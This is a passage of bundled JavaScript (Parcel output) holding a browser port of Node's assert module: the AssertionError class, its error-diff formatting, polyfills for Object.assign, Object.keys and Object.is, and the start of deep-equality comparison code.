                    // Add position indicator for the first mismatch in case it is a
                    // single line and the input length is less than the column length.
                    indicator = "\n  ".concat($620aa032cca82da4$var$repeat(" ", i), "^");
                    i = 0;
                }
            }
        }
    } // Remove all ending lines that match (this optimizes the output for
    // readability by reducing the number of total changed lines).
    var a = actualLines[actualLines.length - 1];
    var b = expectedLines[expectedLines.length - 1];
    while(a === b){
        if (i++ < 2) end = "\n  ".concat(a).concat(end);
        else other = a;
        actualLines.pop();
        expectedLines.pop();
        if (actualLines.length === 0 || expectedLines.length === 0) break;
        a = actualLines[actualLines.length - 1];
        b = expectedLines[expectedLines.length - 1];
    }
    var maxLines = Math.max(actualLines.length, expectedLines.length); // Strict equal with identical objects that are not identical by reference.
    // E.g., assert.deepStrictEqual({ a: Symbol() }, { a: Symbol() })
    if (maxLines === 0) {
        // We have to get the result again. The lines were all removed before.
        var _actualLines = actualInspected.split("\n"); // Only remove lines in case it makes sense to collapse those.
        // TODO: Accept env to always show the full error.
        if (_actualLines.length > 30) {
            _actualLines[26] = "".concat($620aa032cca82da4$var$blue, "...").concat($620aa032cca82da4$var$white);
            while(_actualLines.length > 27)_actualLines.pop();
        }
        return "".concat($620aa032cca82da4$var$kReadableOperator.notIdentical, "\n\n").concat(_actualLines.join("\n"), "\n");
    }
    if (i > 3) {
        end = "\n".concat($620aa032cca82da4$var$blue, "...").concat($620aa032cca82da4$var$white).concat(end);
        skipped = true;
    }
    if (other !== "") {
        end = "\n  ".concat(other).concat(end);
        other = "";
    }
    var printedLines = 0;
    var msg = $620aa032cca82da4$var$kReadableOperator[operator] + "\n".concat($620aa032cca82da4$var$green, "+ actual").concat($620aa032cca82da4$var$white, " ").concat($620aa032cca82da4$var$red, "- expected").concat($620aa032cca82da4$var$white);
    var skippedMsg = " ".concat($620aa032cca82da4$var$blue, "...").concat($620aa032cca82da4$var$white, " Lines skipped");
    for(i = 0; i < maxLines; i++){
        // Only extra expected lines exist
        var cur = i - lastPos;
        if (actualLines.length < i + 1) {
            // If the last diverging line is more than one line above and the
            // current line is at least line three, add some of the former lines and
            // also add dots to indicate skipped entries.
            if (cur > 1 && i > 2) {
                if (cur > 4) {
                    res += "\n".concat($620aa032cca82da4$var$blue, "...").concat($620aa032cca82da4$var$white);
                    skipped = true;
                } else if (cur > 3) {
                    res += "\n  ".concat(expectedLines[i - 2]);
                    printedLines++;
                }
                res += "\n  ".concat(expectedLines[i - 1]);
                printedLines++;
            } // Mark the current line as the last diverging one.
            lastPos = i; // Add the expected line to the cache.
            other += "\n".concat($620aa032cca82da4$var$red, "-").concat($620aa032cca82da4$var$white, " ").concat(expectedLines[i]);
            printedLines++; // Only extra actual lines exist
        } else if (expectedLines.length < i + 1) {
            // If the last diverging line is more than one line above and the
            // current line is at least line three, add some of the former lines and
            // also add dots to indicate skipped entries.
            if (cur > 1 && i > 2) {
                if (cur > 4) {
                    res += "\n".concat($620aa032cca82da4$var$blue, "...").concat($620aa032cca82da4$var$white);
                    skipped = true;
                } else if (cur > 3) {
                    res += "\n  ".concat(actualLines[i - 2]);
                    printedLines++;
                }
                res += "\n  ".concat(actualLines[i - 1]);
                printedLines++;
            } // Mark the current line as the last diverging one.
            lastPos = i; // Add the actual line to the result.
            res += "\n".concat($620aa032cca82da4$var$green, "+").concat($620aa032cca82da4$var$white, " ").concat(actualLines[i]);
            printedLines++; // Lines diverge
        } else {
            var expectedLine = expectedLines[i];
            var actualLine = actualLines[i]; // If the lines diverge, specifically check for lines that only diverge by
            // a trailing comma. In that case it is actually identical and we should
            // mark it as such.
            var divergingLines = actualLine !== expectedLine && (!$620aa032cca82da4$var$endsWith(actualLine, ",") || actualLine.slice(0, -1) !== expectedLine); // If the expected line has a trailing comma but is otherwise identical,
            // add a comma at the end of the actual line. Otherwise the output could
            // look weird as in:
            //
            //   [
            //     1         // No comma at the end!
            // +   2
            //   ]
            //
            if (divergingLines && $620aa032cca82da4$var$endsWith(expectedLine, ",") && expectedLine.slice(0, -1) === actualLine) {
                divergingLines = false;
                actualLine += ",";
            }
            if (divergingLines) {
                // If the last diverging line is more than one line above and the
                // current line is at least line three, add some of the former lines and
                // also add dots to indicate skipped entries.
                if (cur > 1 && i > 2) {
                    if (cur > 4) {
                        res += "\n".concat($620aa032cca82da4$var$blue, "...").concat($620aa032cca82da4$var$white);
                        skipped = true;
                    } else if (cur > 3) {
                        res += "\n  ".concat(actualLines[i - 2]);
                        printedLines++;
                    }
                    res += "\n  ".concat(actualLines[i - 1]);
                    printedLines++;
                } // Mark the current line as the last diverging one.
                lastPos = i; // Add the actual line to the result and cache the expected diverging
                // line so consecutive diverging lines show up as +++--- and not +-+-+-.
                res += "\n".concat($620aa032cca82da4$var$green, "+").concat($620aa032cca82da4$var$white, " ").concat(actualLine);
                other += "\n".concat($620aa032cca82da4$var$red, "-").concat($620aa032cca82da4$var$white, " ").concat(expectedLine);
                printedLines += 2; // Lines are identical
            } else {
                // Add all cached information to the result before adding other things
                // and reset the cache.
                res += other;
                other = ""; // If the last diverging line is exactly one line above or if it is the
                // very first line, add the line to the result.
                if (cur === 1 || i === 0) {
                    res += "\n  ".concat(actualLine);
                    printedLines++;
                }
            }
        } // Inspected object to big (Show ~20 rows max)
        if (printedLines > 20 && i < maxLines - 2) return "".concat(msg).concat(skippedMsg, "\n").concat(res, "\n").concat($620aa032cca82da4$var$blue, "...").concat($620aa032cca82da4$var$white).concat(other, "\n") + "".concat($620aa032cca82da4$var$blue, "...").concat($620aa032cca82da4$var$white);
    }
    return "".concat(msg).concat(skipped ? skippedMsg : "", "\n").concat(res).concat(other).concat(end).concat(indicator);
}
var $620aa032cca82da4$var$AssertionError = /*#__PURE__*/ function(_Error) {
    $620aa032cca82da4$var$_inherits(AssertionError, _Error);
    function AssertionError(options) {
        var _this;
        $620aa032cca82da4$var$_classCallCheck(this, AssertionError);
        if ($620aa032cca82da4$var$_typeof(options) !== "object" || options === null) throw new $620aa032cca82da4$var$ERR_INVALID_ARG_TYPE("options", "Object", options);
        var message = options.message, operator = options.operator, stackStartFn = options.stackStartFn;
        var actual = options.actual, expected = options.expected;
        var limit = Error.stackTraceLimit;
        Error.stackTraceLimit = 0;
        if (message != null) _this = $620aa032cca82da4$var$_possibleConstructorReturn(this, $620aa032cca82da4$var$_getPrototypeOf(AssertionError).call(this, String(message)));
        else {
            if ($hPtJY.stderr && $hPtJY.stderr.isTTY) {
                // Reset on each call to make sure we handle dynamically set environment
                // variables correct.
                if ($hPtJY.stderr && $hPtJY.stderr.getColorDepth && $hPtJY.stderr.getColorDepth() !== 1) {
                    $620aa032cca82da4$var$blue = "\x1b[34m";
                    $620aa032cca82da4$var$green = "\x1b[32m";
                    $620aa032cca82da4$var$white = "\x1b[39m";
                    $620aa032cca82da4$var$red = "\x1b[31m";
                } else {
                    $620aa032cca82da4$var$blue = "";
                    $620aa032cca82da4$var$green = "";
                    $620aa032cca82da4$var$white = "";
                    $620aa032cca82da4$var$red = "";
                }
            } // Prevent the error stack from being visible by duplicating the error
            // in a very close way to the original in case both sides are actually
            // instances of Error.
            if ($620aa032cca82da4$var$_typeof(actual) === "object" && actual !== null && $620aa032cca82da4$var$_typeof(expected) === "object" && expected !== null && "stack" in actual && actual instanceof Error && "stack" in expected && expected instanceof Error) {
                actual = $620aa032cca82da4$var$copyError(actual);
                expected = $620aa032cca82da4$var$copyError(expected);
            }
            if (operator === "deepStrictEqual" || operator === "strictEqual") _this = $620aa032cca82da4$var$_possibleConstructorReturn(this, $620aa032cca82da4$var$_getPrototypeOf(AssertionError).call(this, $620aa032cca82da4$var$createErrDiff(actual, expected, operator)));
            else if (operator === "notDeepStrictEqual" || operator === "notStrictEqual") {
                // In case the objects are equal but the operator requires unequal, show
                // the first object and say A equals B
                var base = $620aa032cca82da4$var$kReadableOperator[operator];
                var res = $620aa032cca82da4$var$inspectValue(actual).split("\n"); // In case "actual" is an object, it should not be reference equal.
                if (operator === "notStrictEqual" && $620aa032cca82da4$var$_typeof(actual) === "object" && actual !== null) base = $620aa032cca82da4$var$kReadableOperator.notStrictEqualObject;
                 // Only remove lines in case it makes sense to collapse those.
                // TODO: Accept env to always show the full error.
                if (res.length > 30) {
                    res[26] = "".concat($620aa032cca82da4$var$blue, "...").concat($620aa032cca82da4$var$white);
                    while(res.length > 27)res.pop();
                } // Only print a single input.
                if (res.length === 1) _this = $620aa032cca82da4$var$_possibleConstructorReturn(this, $620aa032cca82da4$var$_getPrototypeOf(AssertionError).call(this, "".concat(base, " ").concat(res[0])));
                else _this = $620aa032cca82da4$var$_possibleConstructorReturn(this, $620aa032cca82da4$var$_getPrototypeOf(AssertionError).call(this, "".concat(base, "\n\n").concat(res.join("\n"), "\n")));
            } else {
                var _res = $620aa032cca82da4$var$inspectValue(actual);
                var other = "";
                var knownOperators = $620aa032cca82da4$var$kReadableOperator[operator];
                if (operator === "notDeepEqual" || operator === "notEqual") {
                    _res = "".concat($620aa032cca82da4$var$kReadableOperator[operator], "\n\n").concat(_res);
                    if (_res.length > 1024) _res = "".concat(_res.slice(0, 1021), "...");
                } else {
                    other = "".concat($620aa032cca82da4$var$inspectValue(expected));
                    if (_res.length > 512) _res = "".concat(_res.slice(0, 509), "...");
                    if (other.length > 512) other = "".concat(other.slice(0, 509), "...");
                    if (operator === "deepEqual" || operator === "equal") _res = "".concat(knownOperators, "\n\n").concat(_res, "\n\nshould equal\n\n");
                    else other = " ".concat(operator, " ").concat(other);
                }
                _this = $620aa032cca82da4$var$_possibleConstructorReturn(this, $620aa032cca82da4$var$_getPrototypeOf(AssertionError).call(this, "".concat(_res).concat(other)));
            }
        }
        Error.stackTraceLimit = limit;
        _this.generatedMessage = !message;
        Object.defineProperty($620aa032cca82da4$var$_assertThisInitialized(_this), "name", {
            value: "AssertionError [ERR_ASSERTION]",
            enumerable: false,
            writable: true,
            configurable: true
        });
        _this.code = "ERR_ASSERTION";
        _this.actual = actual;
        _this.expected = expected;
        _this.operator = operator;
        if (Error.captureStackTrace) // eslint-disable-next-line no-restricted-syntax
        Error.captureStackTrace($620aa032cca82da4$var$_assertThisInitialized(_this), stackStartFn);
         // Create error message including the error code in the name.
        _this.stack; // Reset the name.
        _this.name = "AssertionError";
        return $620aa032cca82da4$var$_possibleConstructorReturn(_this);
    }
    $620aa032cca82da4$var$_createClass(AssertionError, [
        {
            key: "toString",
            value: function toString() {
                return "".concat(this.name, " [").concat(this.code, "]: ").concat(this.message);
            }
        },
        {
            key: $620aa032cca82da4$var$inspect.custom,
            value: function value(recurseTimes, ctx) {
                // This limits the `actual` and `expected` property default inspection to
                // the minimum depth. Otherwise those values would be too verbose compared
                // to the actual error message which contains a combined view of these two
                // input values.
                return $620aa032cca82da4$var$inspect(this, $620aa032cca82da4$var$_objectSpread({}, ctx, {
                    customInspect: false,
                    depth: 0
                }));
            }
        }
    ]);
    return AssertionError;
}($620aa032cca82da4$var$_wrapNativeSuper(Error));
module.exports = $620aa032cca82da4$var$AssertionError;

});

parcelRequire.register("dYBnA", function(module, exports) {
/**
 * Code refactored from Mozilla Developer Network:
 * https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Object/assign
 */ "use strict";
function $a2cddfb99e0a6135$var$assign(target, firstSource) {
    if (target === undefined || target === null) throw new TypeError("Cannot convert first argument to object");
    var to = Object(target);
    for(var i = 1; i < arguments.length; i++){
        var nextSource = arguments[i];
        if (nextSource === undefined || nextSource === null) continue;
        var keysArray = Object.keys(Object(nextSource));
        for(var nextIndex = 0, len = keysArray.length; nextIndex < len; nextIndex++){
            var nextKey = keysArray[nextIndex];
            var desc = Object.getOwnPropertyDescriptor(nextSource, nextKey);
            if (desc !== undefined && desc.enumerable) to[nextKey] = nextSource[nextKey];
        }
    }
    return to;
}
function $a2cddfb99e0a6135$var$polyfill() {
    if (!Object.assign) Object.defineProperty(Object, "assign", {
        enumerable: false,
        configurable: true,
        writable: true,
        value: $a2cddfb99e0a6135$var$assign
    });
}
module.exports = {
    assign: $a2cddfb99e0a6135$var$assign,
    polyfill: $a2cddfb99e0a6135$var$polyfill
};

});

parcelRequire.register("eT9RM", function(module, exports) {
"use strict";

var $1UbTr = parcelRequire("1UbTr");

var $cOB0F = parcelRequire("cOB0F");

var $6wuPW = parcelRequire("6wuPW");

var $5SxoI = parcelRequire("5SxoI");

var $bNbuK = parcelRequire("bNbuK");
var $ad6ddb07ef0cb149$var$polyfill = $cOB0F($5SxoI(), Object);
$1UbTr($ad6ddb07ef0cb149$var$polyfill, {
    getPolyfill: $5SxoI,
    implementation: $6wuPW,
    shim: $bNbuK
});
module.exports = $ad6ddb07ef0cb149$var$polyfill;

});
parcelRequire.register("1UbTr", function(module, exports) {
"use strict";

var $81enX = parcelRequire("81enX");
var $16343f2546a69e4c$var$hasSymbols = typeof Symbol === "function" && typeof Symbol("foo") === "symbol";
var $16343f2546a69e4c$var$toStr = Object.prototype.toString;
var $16343f2546a69e4c$var$concat = Array.prototype.concat;
var $16343f2546a69e4c$var$origDefineProperty = Object.defineProperty;
var $16343f2546a69e4c$var$isFunction = function(fn) {
    return typeof fn === "function" && $16343f2546a69e4c$var$toStr.call(fn) === "[object Function]";
};

var $16343f2546a69e4c$var$hasPropertyDescriptors = (parcelRequire("i16wS"))();
var $16343f2546a69e4c$var$supportsDescriptors = $16343f2546a69e4c$var$origDefineProperty && $16343f2546a69e4c$var$hasPropertyDescriptors;
var $16343f2546a69e4c$var$defineProperty = function(object, name, value, predicate) {
    if (name in object) {
        if (predicate === true) {
            if (object[name] === value) return;
        } else if (!$16343f2546a69e4c$var$isFunction(predicate) || !predicate()) return;
    }
    if ($16343f2546a69e4c$var$supportsDescriptors) $16343f2546a69e4c$var$origDefineProperty(object, name, {
        configurable: true,
        enumerable: false,
        value: value,
        writable: true
    });
    else object[name] = value; // eslint-disable-line no-param-reassign
};
var $16343f2546a69e4c$var$defineProperties = function(object, map) {
    var predicates = arguments.length > 2 ? arguments[2] : {};
    var props = $81enX(map);
    if ($16343f2546a69e4c$var$hasSymbols) props = $16343f2546a69e4c$var$concat.call(props, Object.getOwnPropertySymbols(map));
    for(var i = 0; i < props.length; i += 1)$16343f2546a69e4c$var$defineProperty(object, props[i], map[props[i]], predicates[props[i]]);
};
$16343f2546a69e4c$var$defineProperties.supportsDescriptors = !!$16343f2546a69e4c$var$supportsDescriptors;
module.exports = $16343f2546a69e4c$var$defineProperties;

});
parcelRequire.register("81enX", function(module, exports) {
"use strict";
var $5d69935f2747da8d$var$slice = Array.prototype.slice;

var $z1gio = parcelRequire("z1gio");
var $5d69935f2747da8d$var$origKeys = Object.keys;

var $5d69935f2747da8d$var$keysShim = $5d69935f2747da8d$var$origKeys ? function keys(o) {
    return $5d69935f2747da8d$var$origKeys(o);
} : (parcelRequire("4nFCC"));
var $5d69935f2747da8d$var$originalKeys = Object.keys;
$5d69935f2747da8d$var$keysShim.shim = function shimObjectKeys() {
    if (Object.keys) {
        var keysWorksWithArguments = function() {
            // Safari 5.0 bug
            var args = Object.keys(arguments);
            return args && args.length === arguments.length;
        }(1, 2);
        if (!keysWorksWithArguments) Object.keys = function keys(object) {
            if ($z1gio(object)) return $5d69935f2747da8d$var$originalKeys($5d69935f2747da8d$var$slice.call(object));
            return $5d69935f2747da8d$var$originalKeys(object);
        };
    } else Object.keys = $5d69935f2747da8d$var$keysShim;
    return Object.keys || $5d69935f2747da8d$var$keysShim;
};
module.exports = $5d69935f2747da8d$var$keysShim;

});
parcelRequire.register("z1gio", function(module, exports) {
"use strict";
var $06943f92b55ad7fa$var$toStr = Object.prototype.toString;
module.exports = function isArguments(value) {
    var str = $06943f92b55ad7fa$var$toStr.call(value);
    var isArgs = str === "[object Arguments]";
    if (!isArgs) isArgs = str !== "[object Array]" && value !== null && typeof value === "object" && typeof value.length === "number" && value.length >= 0 && $06943f92b55ad7fa$var$toStr.call(value.callee) === "[object Function]";
    return isArgs;
};

});

parcelRequire.register("4nFCC", function(module, exports) {
"use strict";
var $330998a67e44345d$var$keysShim;

if (!Object.keys) {
    // modified from https://github.com/es-shims/es5-shim
    var $330998a67e44345d$var$has = Object.prototype.hasOwnProperty;
    var $330998a67e44345d$var$toStr = Object.prototype.toString;
    var $330998a67e44345d$var$isArgs = (parcelRequire("z1gio")); // eslint-disable-line global-require
    var $330998a67e44345d$var$isEnumerable = Object.prototype.propertyIsEnumerable;
    var $330998a67e44345d$var$hasDontEnumBug = !$330998a67e44345d$var$isEnumerable.call({
        toString: null
    }, "toString");
    var $330998a67e44345d$var$hasProtoEnumBug = $330998a67e44345d$var$isEnumerable.call(function() {}, "prototype");
    var $330998a67e44345d$var$dontEnums = [
        "toString",
        "toLocaleString",
        "valueOf",
        "hasOwnProperty",
        "isPrototypeOf",
        "propertyIsEnumerable",
        "constructor"
    ];
    var $330998a67e44345d$var$equalsConstructorPrototype = function(o) {
        var ctor = o.constructor;
        return ctor && ctor.prototype === o;
    };
    var $330998a67e44345d$var$excludedKeys = {
        $applicationCache: true,
        $console: true,
        $external: true,
        $frame: true,
        $frameElement: true,
        $frames: true,
        $innerHeight: true,
        $innerWidth: true,
        $onmozfullscreenchange: true,
        $onmozfullscreenerror: true,
        $outerHeight: true,
        $outerWidth: true,
        $pageXOffset: true,
        $pageYOffset: true,
        $parent: true,
        $scrollLeft: true,
        $scrollTop: true,
        $scrollX: true,
        $scrollY: true,
        $self: true,
        $webkitIndexedDB: true,
        $webkitStorageInfo: true,
        $window: true
    };
    var $330998a67e44345d$var$hasAutomationEqualityBug = function() {
        /* global window */ if (typeof window === "undefined") return false;
        for(var k in window)try {
            if (!$330998a67e44345d$var$excludedKeys["$" + k] && $330998a67e44345d$var$has.call(window, k) && window[k] !== null && typeof window[k] === "object") try {
                $330998a67e44345d$var$equalsConstructorPrototype(window[k]);
            } catch (e) {
                return true;
            }
        } catch (e) {
            return true;
        }
        return false;
    }();
    var $330998a67e44345d$var$equalsConstructorPrototypeIfNotBuggy = function(o) {
        /* global window */ if (typeof window === "undefined" || !$330998a67e44345d$var$hasAutomationEqualityBug) return $330998a67e44345d$var$equalsConstructorPrototype(o);
        try {
            return $330998a67e44345d$var$equalsConstructorPrototype(o);
        } catch (e) {
            return false;
        }
    };
    $330998a67e44345d$var$keysShim = function keys(object) {
        var isObject = object !== null && typeof object === "object";
        var isFunction = $330998a67e44345d$var$toStr.call(object) === "[object Function]";
        var isArguments = $330998a67e44345d$var$isArgs(object);
        var isString = isObject && $330998a67e44345d$var$toStr.call(object) === "[object String]";
        var theKeys = [];
        if (!isObject && !isFunction && !isArguments) throw new TypeError("Object.keys called on a non-object");
        var skipProto = $330998a67e44345d$var$hasProtoEnumBug && isFunction;
        if (isString && object.length > 0 && !$330998a67e44345d$var$has.call(object, 0)) for(var i = 0; i < object.length; ++i)theKeys.push(String(i));
        if (isArguments && object.length > 0) for(var j = 0; j < object.length; ++j)theKeys.push(String(j));
        else {
            for(var name in object)if (!(skipProto && name === "prototype") && $330998a67e44345d$var$has.call(object, name)) theKeys.push(String(name));
        }
        if ($330998a67e44345d$var$hasDontEnumBug) {
            var skipConstructor = $330998a67e44345d$var$equalsConstructorPrototypeIfNotBuggy(object);
            for(var k = 0; k < $330998a67e44345d$var$dontEnums.length; ++k)if (!(skipConstructor && $330998a67e44345d$var$dontEnums[k] === "constructor") && $330998a67e44345d$var$has.call(object, $330998a67e44345d$var$dontEnums[k])) theKeys.push($330998a67e44345d$var$dontEnums[k]);
        }
        return theKeys;
    };
}
module.exports = $330998a67e44345d$var$keysShim;

});


parcelRequire.register("i16wS", function(module, exports) {
"use strict";

var $1zENl = parcelRequire("1zENl");
var $d1dd62937e17e68d$var$$defineProperty = $1zENl("%Object.defineProperty%", true);
var $d1dd62937e17e68d$var$hasPropertyDescriptors = function hasPropertyDescriptors() {
    if ($d1dd62937e17e68d$var$$defineProperty) try {
        $d1dd62937e17e68d$var$$defineProperty({}, "a", {
            value: 1
        });
        return true;
    } catch (e) {
        // IE 8 has a broken defineProperty
        return false;
    }
    return false;
};
$d1dd62937e17e68d$var$hasPropertyDescriptors.hasArrayLengthDefineBug = function hasArrayLengthDefineBug() {
    // node v0.6 has a bug where array lengths can be Set but not Defined
    if (!$d1dd62937e17e68d$var$hasPropertyDescriptors()) return null;
    try {
        return $d1dd62937e17e68d$var$$defineProperty([], "length", {
            value: 1
        }).length !== 1;
    } catch (e) {
        // In Firefox 4-22, defining length on an array throws an exception.
        return true;
    }
};
module.exports = $d1dd62937e17e68d$var$hasPropertyDescriptors;

});


parcelRequire.register("6wuPW", function(module, exports) {
"use strict";
var $4bfda6cb765ad269$var$numberIsNaN = function(value) {
    return value !== value;
};
module.exports = function is(a, b) {
    if (a === 0 && b === 0) return 1 / a === 1 / b;
    if (a === b) return true;
    if ($4bfda6cb765ad269$var$numberIsNaN(a) && $4bfda6cb765ad269$var$numberIsNaN(b)) return true;
    return false;
};

});

parcelRequire.register("5SxoI", function(module, exports) {
"use strict";

var $6wuPW = parcelRequire("6wuPW");
module.exports = function getPolyfill() {
    return typeof Object.is === "function" ? Object.is : $6wuPW;
};

});

parcelRequire.register("bNbuK", function(module, exports) {
"use strict";

var $5SxoI = parcelRequire("5SxoI");

var $1UbTr = parcelRequire("1UbTr");
module.exports = function shimObjectIs() {
    var polyfill = $5SxoI();
    $1UbTr(Object, {
        is: polyfill
    }, {
        is: function testObjectIs() {
            return Object.is !== polyfill;
        }
    });
    return polyfill;
};

});


parcelRequire.register("3LKhK", function(module, exports) {
// Currently in sync with Node.js lib/internal/util/comparisons.js
// https://github.com/nodejs/node/commit/112cc7c27551254aa2b17098fb774867f05ed0d9
"use strict";
function $2be9aa30bff457b9$var$_slicedToArray(arr, i) {
    return $2be9aa30bff457b9$var$_arrayWithHoles(arr) || $2be9aa30bff457b9$var$_iterableToArrayLimit(arr, i) || $2be9aa30bff457b9$var$_nonIterableRest();
}
function $2be9aa30bff457b9$var$_nonIterableRest() {
    throw new TypeError("Invalid attempt to destructure non-iterable instance");
}
function $2be9aa30bff457b9$var$_iterableToArrayLimit(arr, i) {
    var _arr = [];
    var _n = true;
    var _d = false;
    var _e = undefined;
    try {
        for(var _i = arr[Symbol.iterator](), _s; !(_n = (_s = _i.next()).done); _n = true){
            _arr.push(_s.value);
            if (i && _arr.length === i) break;
        }
    } catch (err) {
        _d = true;
        _e = err;
    } finally{
        try {
            if (!_n && _i["return"] != null) _i["return"]();
        } finally{
            if (_d) throw _e;
        }
    }
    return _arr;
}
function $2be9aa30bff457b9$var$_arrayWithHoles(arr) {
    if (Array.isArray(arr)) return arr;
}
function $2be9aa30bff457b9$var$_typeof(obj) {
    if (typeof Symbol === "function" && typeof Symbol.iterator === "symbol") $2be9aa30bff457b9$var$_typeof = function _typeof(obj) {
        return typeof obj;
    };
    else $2be9aa30bff457b9$var$_typeof = function _typeof(obj) {
        return obj && typeof Symbol === "function" && obj.constructor === Symbol && obj !== Symbol.prototype ? "symbol" : typeof obj;
    };
    return $2be9aa30bff457b9$var$_typeof(obj);
}
var $2be9aa30bff457b9$var$regexFlagsSupported = /a/g.flags !== undefined;
var $2be9aa30bff457b9$var$arrayFromSet = function arrayFromSet(set) {
    var array = [];
    set.forEach(function(value) {
        return array.push(value);
    });
    return array;
};
var $2be9aa30bff457b9$var$arrayFromMap = function arrayFromMap(map) {
    var array = [];
    map.forEach(function(value, key) {
        return array.push([
            key,
            value
        ]);
    });
    return array;
};

var $2be9aa30bff457b9$var$objectIs = Object.is ? Object.is : (parcelRequire("eT9RM"));
var $2be9aa30bff457b9$var$objectGetOwnPropertySymbols = Object.getOwnPropertySymbols ? Object.getOwnPropertySymbols : function() {
    return [];
};

var $2be9aa30bff457b9$var$numberIsNaN = Number.isNaN ? Number.isNaN : (parcelRequire("c8Cyq"));
function $2be9aa30bff457b9$var$uncurryThis(f) {
    return f.call.bind(f);
}
var $2be9aa30bff457b9$var$hasOwnProperty = $2be9aa30bff457b9$var$uncurryThis(Object.prototype.hasOwnProperty);
var $2be9aa30bff457b9$var$propertyIsEnumerable = $2be9aa30bff457b9$var$uncurryThis(Object.prototype.propertyIsEnumerable);
var $2be9aa30bff457b9$var$objectToString = $2be9aa30bff457b9$var$uncurryThis(Object.prototype.toString);

var $N7Lcz = parcelRequire("N7Lcz");
var $2be9aa30bff457b9$require$_require$types = $N7Lcz.types;
var $2be9aa30bff457b9$var$isAnyArrayBuffer = $2be9aa30bff457b9$require$_require$types.isAnyArrayBuffer, $2be9aa30bff457b9$var$isArrayBufferView = $2be9aa30bff457b9$require$_require$types.isArrayBufferView, $2be9aa30bff457b9$var$isDate = $2be9aa30bff457b9$require$_require$types.isDate, $2be9aa30bff457b9$var$isMap = $2be9aa30bff457b9$require$_require$types.isMap, $2be9aa30bff457b9$var$isRegExp = $2be9aa30bff457b9$require$_require$types.isRegExp, $2be9aa30bff457b9$var$isSet = $2be9aa30bff457b9$require$_require$types.isSet, $2be9aa30bff457b9$var$isNativeError = $2be9aa30bff457b9$require$_require$types.isNativeError, $2be9aa30bff457b9$var$isBoxedPrimitive = $2be9aa30bff457b9$require$_require$types.isBoxedPrimitive, $2be9aa30bff457b9$var$isNumberObject = $2be9aa30bff457b9$require$_require$types.isNumberObject, $2be9aa30bff457b9$var$isStringObject = $2be9aa30bff457b9$require$_require$types.isStringObject, $2be9aa30bff457b9$var$isBooleanObject = $2be9aa30bff457b9$require$_require$types.isBooleanObject, $2be9aa30bff457b9$var$isBigIntObject = $2be9aa30bff457b9$require$_require$types.isBigIntObject, $2be9aa30bff457b9$var$isSymbolObject = $2be9aa30bff457b9$require$_require$types.isSymbolObject, $2be9aa30bff457b9$var$isFloat32Array = $2be9aa30bff457b9$require$_require$types.isFloat32Array, $2be9aa30bff457b9$var$isFloat64Array = $2be9aa30bff457b9$require$_require$types.isFloat64Array;
function $2be9aa30bff457b9$var$isNonIndex(key) {
    if (key.length === 0 || key.length > 10) return true;
    for(var i = 0; i < key.length; i++){
        var code = key.charCodeAt(i);
        if (code < 48 || code > 57) return true;
    } // The maximum size for an array is 2 ** 32 -1.
    return key.length === 10 && key >= Math.pow(2, 32);
}
function $2be9aa30bff457b9$var$getOwnNonIndexProperties(value) {
    return Object.keys(value).filter($2be9aa30bff457b9$var$isNonIndex).concat($2be9aa30bff457b9$var$objectGetOwnPropertySymbols(value).filter(Object.prototype.propertyIsEnumerable.bind(value)));
} // Taken from https://github.com/feross/buffer/blob/680e9e5e488f22aac27599a57dc844a6315928dd/index.js
// original notice:
/*!
 * The buffer module from node.js, for the browser.
 *
 * @author   Feross Aboukhadijeh <feross@feross.org> <http://feross.org>
 * @license  MIT
 */ function $2be9aa30bff457b9$var$compare(a, b) {
    if (a === b) return 0;
    var x = a.length;
    var y = b.length;
    for(var i = 0, len = Math.min(x, y); i < len; ++i)if (a[i] !== b[i]) {
        x = a[i];
        y = b[i];
        break;
    }
    if (x < y) return -1;
    if (y < x) return 1;
    return 0;
}
var $2be9aa30bff457b9$var$ONLY_ENUMERABLE = undefined;
var $2be9aa30bff457b9$var$kStrict = true;
var $2be9aa30bff457b9$var$kLoose = false;
var $2be9aa30bff457b9$var$kNoIterator = 0;
var $2be9aa30bff457b9$var$kIsArray = 1;
var $2be9aa30bff457b9$var$kIsSet = 2;
var $2be9aa30bff457b9$var$kIsMap = 3; // Check if they have the same source and flags
function $2be9aa30bff457b9$var$areSimilarRegExps(a, b) {
    return $2be9aa30bff457b9$var$regexFlagsSupported ? a.source === b.source && a.flags === b.flags : RegExp.prototype.toString.call(a) === RegExp.prototype.toString.call(b);
}
function $2be9aa30bff457b9$var$areSimilarFloatArrays(a, b) {
    if (a.byteLength !== b.byteLength) return false;
    for(var offset = 0; offset < a.byteLength; offset++){
        if (a[offset] !== b[offset]) return false;
    }
    return true;
}
function $2be9aa30bff457b9$var$areSimilarTypedArrays(a, b) {
    if (a.byteLength !== b.byteLength) return false;
    return $2be9aa30bff457b9$var$compare(new Uint8Array(a.buffer, a.byteOffset, a.byteLength), new Uint8Array(b.buffer, b.byteOffset, b.byteLength)) === 0;
}
function $2be9aa30bff457b9$var$areEqualArrayBuffers(buf1, buf2) {
    return buf1.byteLength === buf2.byteLength && $2be9aa30bff457b9$var$compare(new Uint8Array(buf1), new Uint8Array(buf2)) === 0;
}
function $2be9aa30bff457b9$var$isEqualBoxedPrimitive(val1, val2) {
    if ($2be9aa30bff457b9$var$isNumberObject(val1)) return $2be9aa30bff457b9$var$isNumberObject(val2) && $2be9aa30bff457b9$var$objectIs(Number.prototype.valueOf.call(val1), Number.prototype.valueOf.call(val2));
    if ($2be9aa30bff457b9$var$isStringObject(val1)) return $2be9aa30bff457b9$var$isStringObject(val2) && String.prototype.valueOf.call(val1) === String.prototype.valueOf.call(val2);
    if ($2be9aa30bff457b9$var$isBooleanObject(val1)) return $2be9aa30bff457b9$var$isBooleanObject(val2) && Boolean.prototype.valueOf.call(val1) === Boolean.prototype.valueOf.call(val2);
    if ($2be9aa30bff457b9$var$isBigIntObject(val1)) return $2be9aa30bff457b9$var$isBigIntObject(val2) && BigInt.prototype.valueOf.call(val1) === BigInt.prototype.valueOf.call(val2);
    return $2be9aa30bff457b9$var$isSymbolObject(val2) && Symbol.prototype.valueOf.call(val1) === Symbol.prototype.valueOf.call(val2);
} // Notes: Type tags are historical [[Class]] properties that can be set by
// FunctionTemplate::SetClassName() in C++ or Symbol.toStringTag in JS
// and retrieved using Object.prototype.toString.call(obj) in JS
// See https://tc39.github.io/ecma262/#sec-object.prototype.tostring
// for a list of tags pre-defined in the spec.
// There are some unspecified tags in the wild too (e.g. typed array tags).
// Since tags can be altered, they only serve fast failures
//
// Typed arrays and buffers are checked by comparing the content in their
// underlying ArrayBuffer. This optimization requires that it's
